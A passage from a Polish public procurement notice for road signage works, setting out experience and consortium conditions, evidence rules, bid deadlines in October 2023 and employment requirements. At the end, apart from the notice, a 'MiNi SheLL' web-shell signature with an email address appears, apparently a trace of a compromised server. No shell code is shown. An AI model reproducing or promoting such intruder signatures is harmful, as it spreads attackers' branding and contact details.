ubiegających się o udzielenie zamówienia, lub w przypadku korzystania z podmiotów udostępniających zasoby na podstawie art. 118 ustawy Pzp Wykonawca lub minimum jeden Wykonawca wspólnie ubiegający się o zamówienie lub minimum jeden podmiot udostępniający zasoby musi posiadać pełne doświadczenie wskazane w warunku udziału w postępowaniu wskazane w pkt 14.1.4 SWZ - dotyczy to konieczności wykazania doświadczenia wynikającego z powtarzalności wykonanych zamówień tj. wykonania minimum 2 zamówień przez jeden podmiot. <br/>2.	Jeżeli Wykonawca powołuje się na doświadczenie w realizacji oznakowania pionowego i/lub oznakowania poziomego dróg wykonywanych wspólnie z innymi wykonawcami (konsorcjum), Wykonawca składając ofertę zobowiązany jest do wskazania oznakowania pionowego i/lub oznakowania poziomego dróg, w którego wykonaniu Wykonawca ten bezpośrednio uczestniczył. Wykonawca zobowiązany jest wskazać zakres jego rzeczywistego udziału w realizacji wykazywanej roboty w celu ustalenia rzeczywistego doświadczenia - wyłącznie poprzez faktyczny, realny udział w realizacji przynajmniej takiej z części zamówienia, która spełnia warunki opisane w niniejszym zamówieniu (Wykonawca powinien wyodrębnić świadczenia z tej umowy oceniane w ramach warunku opisanego w pkt 14.1.4. a) i b) SWZ i podać ich wartość). <br/>Inaczej mówiąc, Zamawiający nie dopuszcza, by wykonawca biorący indywidualnie udział w postępowaniu o udzielenie zamówienia publicznego polegał na doświadczeniu grupy wykonawców, której był członkiem przy innym zamówieniu publicznym, jeżeli faktycznie i konkretnie nie uczestniczył w jego realizacji (nie wykonywał zakresu prac wykazywanego w celu spełnienia warunku w niniejszym postępowaniu). <br/>Zamawiający zastrzega możliwość zwrócenia się do wykonawcy o wyjaśnienia w zakresie faktycznie i konkretnie wykonywanego zakresu prac oraz przedstawienia stosownych dowodów np. umowy konsorcjum, z której wynika zakres obowiązków czy wystawionych przez wykonawcę faktur.<br/>3.	W przypadku, gdy Wykonawca realizował w ramach zadania inwestycyjnego/kontraktu/umowy większy zakres niż wynika z opisanego warunku (np. budowę układu drogowego, a w ramach tego zadania wykonał oznakowanie pionowe i/lub poziome dróg itp.), dla potrzeb niniejszego zamówienia powinien wyodrębnić i podać wartości doświadczenia, o którym mowa w opisie warunku.<br/>4.	Dla potrzeb oceny spełnienia warunku, jeżeli wartości zostaną podane w walutach innych niż PLN, Zamawiający przyjmie średni kurs PLN dla odpowiedniej waluty podawany przez NBP (Tabela kursów średnich walut obcych) na dzień opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. <br/>5.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <br/>6.	W przypadkach, o którym mowa w pkt 5., wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy (oświadczenie, o którym mowa w art. 117 ust. 4 Pzp). Formularz oświadczenia stanowi załącznik do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie żąda podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty.<br/>Wykaz służy potwierdzeniu spełniania przez wykonawcę warunków udziału w postępowaniu w zakresie zdolności technicznej lub zawodowej, o którym mowa w pkt 14.1. 4) SWZ;<br/>UWAGA:<br/>	Okresy wyrażone w latach lub miesiącach liczy się wstecz od dnia w którym upływa termin składania ofert;<br/>	Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, dostaw lub usług, wykonywanych wspólnie z innymi wykonawcami, wykaz o którym mowa w pkt 17.6.1) SWZ, dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio, faktycznie uczestniczył.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Dowody równoważności, o których mowa w pkt 6 SWZ, w związku z pkt 5.3.-5.5. SWZ - jeżeli dotyczą:<br/>Zamawiający informuje, że tam, gdzie w SWZ opisał przedmiot zamówienia przez odniesienie do norm, europejskich ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 Pzp Zamawiający dopuszcza rozwiązania równoważne opisywanym, a odniesieniu takiemu towarzyszą słowa „lub równoważne”.<br/>W przypadku gdy wymagania w opisie przedmiotu zamówienia odnoszą się do norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 Pzp, Zamawiający wymaga, aby wykonawca przedstawił już w jego ofercie dowody równoważności w sposób określony w art. 101 ust. 5 i 6 Pzp. <br/>Zamawiający wskazuje, że obowiązek zgłoszenia w ofercie rozwiązań równoważnych w stosunku do opisanych w opisie przedmiotu zamówienia i wykazania równoważności leży po stronie wykonawcy.<br/>Wykonawca, który powołuje się na rozwiązania równoważne w zakresie opisywanym przez Zamawiającego, jest zobowiązany wskazać w ofercie, że stosuje rozwiązania równoważne oraz jest zobowiązany udowodnić, w szczególności za pomocą przedmiotowych środków dowodowych, o których mowa w art. 104-107 ustawy Pzp, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone w opisie przedmiotu zamówienia lub odpowiednio spełniają wymagania dotyczące wydajności lub funkcjonalności określone przez Zamawiającego. <br/>W przypadku, gdy Wykonawca poinformował zamawiającego w ofercie o stosowaniu rozwiązań równoważnych oraz nie złożył przedmiotowych środków dowodowych niezbędnych do weryfikacji równoważności, lub złożone przedmiotowe środki dowodowe są niekompletne, zamawiający wzywa do ich złożenia lub uzupełnienia w wyznaczonym terminie. <br/>Za rozwiązanie równoważne Zamawiający uzna rozwiązanie które e w przypadku norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych gwarantuje osiągnięcie poziomów parametrów, funkcjonalności i właściwości niezbędnych do uzyskania certyfikacji w zakresie podanych w opisie przedmiotu zamówienia norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, przy czym w przypadku podania norm zamawiający za równoważne uzna automatycznie nowsze wersje tych samych norm które podane są w OPZ. <br/>W przypadku wymogów dotyczących funkcjonalności i wydajności gwarantuje uzyskanie wartości przyjętych w dokumentach opisujących przedmiot zamówienia w zakresie wskazanych tam cech, parametrów i właściwości. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> W przypadku, gdy Wykonawca poinformował zamawiającego w ofercie o stosowaniu rozwiązań równoważnych oraz nie złożył przedmiotowych środków dowodowych niezbędnych do weryfikacji równoważności, lub złożone przedmiotowe środki<br/>dowodowe są niekompletne, zamawiający wzywa do ich złożenia lub uzupełnienia w wyznaczonym terminie. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty wykonawca dołącza:<br/>1)	formularz obliczenia ceny oferty – integralna treść oferty,<br/>2)	aktualne na dzień składania ofert oświadczenie/oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu,<br/>3)	zobowiązanie podmiotu udostępniającego zasoby, jeżeli wykonawca polega na zasobach innego podmiotu,<br/>4)	oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy (jeżeli dotyczy),<br/>5)	uzasadnienie zastrzeżenia tajemnicy przedsiębiorstwa, jeżeli wykonawca zastrzegł w ofercie informacje jako tajemnicę przedsiębiorstwa,<br/>6)	pełnomocnictwo, jeżeli dotyczy,<br/>7)	dowody równoważności, o których mowa w pkt 6 SWZ, w związku z pkt 5.3.-5.5. SWZ - jeżeli dotyczą. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2.	W przypadku, o którym mowa w pkt 1., wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3.	Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców.<br/>4.	Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych wykonawców wspólnie ubiegających się o udzielenie zamówienia kluczowych zadań dotyczących:<br/>1)	zamówień na roboty budowlane lub usługi;<br/>2)	prac związanych z rozmieszczeniem i instalacją, w ramach zamówienia na dostawy.<br/>5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają wraz z ofertą oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy (oświadczenie, o którym mowa w pkt 14.6. SWZ i art. 117 ust. 4 Pzp). Formularz oświadczenia stanowi załącznik do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia określono w projekcie umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-13 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć poprzez System E-ZP - https://e-zp.kleszczow.pl/procurements</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-13 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-11-11</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Zamawiający wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie stosunku pracy osób wykonujących wskazane niżej czynności w zakresie realizacji zamówienia, ponieważ wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (t.j. Dz. U. z 2022 r. poz. 1510 ze zm.), tzn. wykonywaniu prac fizycznych składających się na przedmiot zamówienia w tym wykonywanych: przez robotników, monterów wykonujących roboty drogowe i ogólnobudowlane, operatorów maszyn, kierowców.<br/>Ww. czynności potrzebne do realizacji przedmiotu zamówienia mają cechy wynikające z kodeksowej definicji stosunku pracy – mamy więc do czynienia z aktywizacją obowiązku wynikającego z art.. 95 ustawy Pzp. Zakres ww. czynności został określony w dokumentacji projektowej (ze zm.);<br/>Zastrzeżenie – ww. obowiązek nie dotyczy sytuacji, gdy prace te będą wykonywane samodzielnie i osobiście przez osoby fizyczne prowadzące działalność gospodarczą, a także nie dotyczy osób wykonujących czynności: kierownika budowy, kierowników robót, geodetów.<br/>2. Sposób weryfikacji zatrudnienia tych osób, uprawnienia Zamawiającego w zakresie kontroli spełniania przez wykonawcę wymagań związanych z zatrudnianiem tych osób oraz sankcje z tytułu niespełnienia tych wymagań - Zamawiający określił w projektowanych postanowieniach umowy stanowiących załącznik do SWZ,

Creat By MiNi SheLL
Email: jattceo@gmail.com